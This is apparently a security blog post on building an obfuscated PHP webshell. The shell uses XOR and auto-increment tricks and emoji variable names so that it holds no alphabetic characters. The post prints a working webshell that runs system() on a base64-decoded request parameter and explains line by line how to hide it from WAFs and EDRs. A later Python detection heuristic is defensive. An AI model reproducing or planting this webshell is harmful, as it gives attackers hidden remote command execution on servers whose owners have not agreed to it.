Introduction
Last time I tried to push myself to learn how to construct a webshell without using any alphabetic characters in PHP. There are a lot of techniques that can be used, such as base operations, auto increment, XOR, etc. This blog has decent techniques that can be used for obfuscation.
Objective of obfuscated webshell
The objective of an obfuscated webshell is simple: execute OS commands without detection. I'm assuming the server's configuration does not disable PHP functions like system(), passthru(), shell_exec() and other functions that can execute OS commands. If the server disables those functions, bypassing that protection is a separate topic. In this blog, we are going to use base64 as the encoding. It is not recommended in the real world because WAFs and EDRs are pretty good at handling base64, so consider using another method to encode/encrypt the payload. Anyway, below is my simple webshell:
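<?php
// [1] use the base64-decoded request parameter if present, else a default command
$a = $_REQUEST[4] ? base64_decode($_REQUEST[4]) : 'whoami'; // [1]
// [2] run the command, suppressing errors with @
@system($a); // [2]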
[1]: Check whether $_REQUEST[4] is empty or not. If it is not empty, decode it using base64 and store it in the $a variable. Otherwise, it'll store whoami instead.
[2]: Execute the command from variable $a.
The idea is simple. The crucial part is how to generate letters without using any letters at all. One of my ideas is to use XOR and auto increment operations to generate letters and numbers, and assign them to emoji used as variable names. Below is how I use auto increment to generate the letters.
Based on Figure 1:
- line 3: Set the $_ variable to an array.
- line 4: Convert the array to the string "Array".
- line 5: ("_" == "_") compares two strings; the result is true, which PHP treats as 1 in arithmetic. So ("_" == "_") + ("_" == "_") is (1) + (1), which becomes 2.
- line 6: @$_[++$__] means @$_[3], so it takes the 4th character of "Array", which is "a".
- line 8-33: Set the emoji variables to 'a' through 'z'. When we increment a variable that contains "a", it becomes "b" and so on.
After constructing the alphabet, we can use certain functions like base64_decode(), $_POST[] and system(). Note that we cannot call eval() through a variable, since it is a language construct, not a function that can be used as a variable function.
Based on Figure 2:
- line 35-37: increment the number.
- line 38: set variable $πΏ to "base6".
- line 39-40: decrement the number.
- line 41: construct the word "base64_decode". If you notice, we use an XOR operation on this line to construct an ASCII underscore "_" by XORing a hashtag with a pipe (as I would call it): "#" ^ "|"
- line 43: set variable $π to "system".
- line 44: set variable $🥳 to "_POST" by using XOR operations to create the underscore and the capital letters, since we did not create any capital letters.
- line 45: check if $_POST[4] is set; if it is set, decode the parameter, otherwise use "whoami", and store the result in variable $🤯.
- line 46: execute system() with the given command.
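For defenders, the constructs walked through above (string XOR, increments on underscore or emoji variables, calls through such variables) leave source that is almost free of letters, which is itself a detectable signal. The following Python heuristic is an added example, not code from the original post; the function name, thresholds and both sample snippets are assumptions constructed for illustration.

```python
import re

# Constructed heuristic; thresholds and names are assumptions, not tuned values.
NAME = r'A-Za-z0-9_\u0080-\U0010ffff'             # characters legal in a PHP variable name
LETTERLESS = r'\$[_0-9\u0080-\U0010ffff]+(?![' + NAME + r'])'  # $_, $__, $<emoji>
STRING_XOR = re.compile(r'''["']\s*\^\s*["']''')  # "#" ^ "|" style string XOR
VAR_CALL = re.compile(LETTERLESS + r'\s*\(')      # call through a letter-free variable
INC_DEC = re.compile(r'(?:\+\+|--)\s*' + LETTERLESS + '|' + LETTERLESS + r'\s*(?:\+\+|--)')
MAX_LETTER_RATIO = 0.30

def analyse(src):
    """Return the signals found in one PHP source string."""
    body = re.sub(r'<\?php|\?>', '', src)
    chars = [c for c in body if not c.isspace()]
    letters = sum(1 for c in chars if c.isascii() and c.isalpha())
    ratio = letters / len(chars) if chars else 1.0
    found = {
        "letter_ratio": round(ratio, 2),
        "string_xor": len(STRING_XOR.findall(body)),
        "letterless_calls": len(VAR_CALL.findall(body)),
        "inc_dec": len(INC_DEC.findall(body)),
    }
    # A call through a letter-free variable is rare in ordinary code; string XOR
    # only counts when the file is also nearly free of letters.
    found["suspicious"] = found["letterless_calls"] > 0 or (
        found["string_xor"] > 0 and ratio < MAX_LETTER_RATIO)
    return found

# Constructed samples. The first is ordinary code (integer XOR, superglobals);
# the second is an inert fragment using only the constructs quoted in the post.
BENIGN = '''<?php
$page = isset($_GET["page"]) ? (int)$_GET["page"] : 1;
$flags = $mask ^ 0x0F;
echo htmlspecialchars("Page " . $page);
'''
LETTER_FREE = '''<?php
$__ = ("_" == "_") + ("_" == "_");
$___ = @$_[++$__];
$____ = "#" ^ "|";
$\U0001F973 = $___ . $____;
$\U0001F973($__);
'''

if __name__ == "__main__":
    for name, src in (("benign", BENIGN), ("letter_free", LETTER_FREE)):
        print(name, analyse(src))
```

Comments are not stripped before the letter ratio is computed, so padding with comments can raise it; the check for calls through letter-free variables does not depend on the ratio.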
Full source code
You can get the full source code on my GitHub.
Summary
Now we have learnt how to use XOR and auto increment operations to generate letters and numbers. These methods allow us to construct a webshell using emoji. I never use this in a real-world scenario, but if you have your own version and want to share, do let me know.